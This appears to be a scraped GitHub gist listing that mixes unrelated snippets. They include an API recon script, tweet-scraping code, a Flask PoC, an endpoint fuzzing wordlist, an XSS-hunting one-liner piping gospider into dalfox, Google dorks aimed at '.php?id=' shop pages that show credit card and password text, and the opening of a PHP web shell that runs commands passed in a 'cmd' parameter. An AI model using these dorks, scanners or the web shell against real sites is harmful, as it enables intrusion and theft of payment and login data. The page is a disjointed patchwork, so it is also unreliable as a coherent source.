🏡
Working from home

Pedro Araujo thezakman

@nullenc0de
nullenc0de / api-linkfinder.sh
Created August 7, 2021 11:17
Exports links and params from API documentation
wget https://gist.githubusercontent.com/nullenc0de/bb16be959686295b3b1caff519cc3e05/raw/2016dc0e692821ec045edd5ae5c0aba5ec9ec3f1/api-linkfinder.yaml
echo https://stripe.com/docs/api | hakrawler -t 500 -d 10 |nuclei -t ./api-linkfinder.yaml -o api.txt
cat api.txt |grep url_params |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_params.txt
cat api.txt |grep relative_links |cut -d ' ' -f 7 |tr , '\n' | tr ] '\n' | tr [ '\n' |tr -d '"' |tr -d "'" |sort -u > api_link_finder.txt
id: api-linkfinder
info:
  name: API Recon
  author: nullenc0de
  severity: info
  tags: file
requests:
  - method: GET
@joaomacalos
joaomacalos / hashtag2.py
Created May 1, 2021 13:57
hashtag2-defapi
# Query
query = "SuperLeague OR #SuperLeague -filter:retweets"
def collect_tweets(query, max_id=None, nitems=100, until=None, result_type='recent'):
    if until is not None:
        tweets = tweepy.Cursor(api.search,
                               q=query,
                               lang="en",
                               tweet_mode="extended",
@cihanmehmet
cihanmehmet / xss_one_liner.md
Last active July 27, 2024 03:17
xss_one_liner.md
#cat targets_urls.txt                
http://public-firing-range.appspot.com

Command Line

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
@clapbr
clapbr / app.py
Last active August 13, 2021 03:07
flask monkeyrunner http remote PoC (don't use this in production)
from flask import Flask
from flask_restful import Resource, Api, reqparse
from com.android.monkeyrunner import MonkeyRunner, MonkeyDevice
from apscheduler.schedulers.background import BackgroundScheduler
import time
import subprocess
app = Flask(__name__)
api = Api(app)
@epikulski
epikulski / app-only-twitter.py
Last active May 14, 2021 00:53
Set up app-only authentication on Twitter
"""
Scratch pad for experimenting with the twitter API.
"""
import base64
import os
import requests
from requests_oauthlib import OAuth1
"""
SECRETS
@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active May 24, 2025 19:23
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000
ntext:"bri".php?id= intext:"Credit Card" site:.com
intext:"kartu kredit".php?id= intext:"Username" site:.com
intext:"bayar dengan kartu kredit".php?id= intext:"Password" site:.com
intitle:"bayar dengan kartu kredit".php?id= title:shop intext:"Credit Card" site:.com
intitle:"human".php?id= title:education intext:"Username" site:.com
intitle:"Publications".php?id= title:login intext:"Password" site:.com
intitle:"project".php?id= title:join intext:"Username" site:.com
intitle:"trade".php?id= title:orders intext:"Username" site:.com
<html>
<body>
<form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>">
<input type="TEXT" name="cmd" autofocus id="cmd" size="80">
<input type="SUBMIT" value="Execute">
</form>
<pre>
<?php
if(isset($_GET['cmd']))
{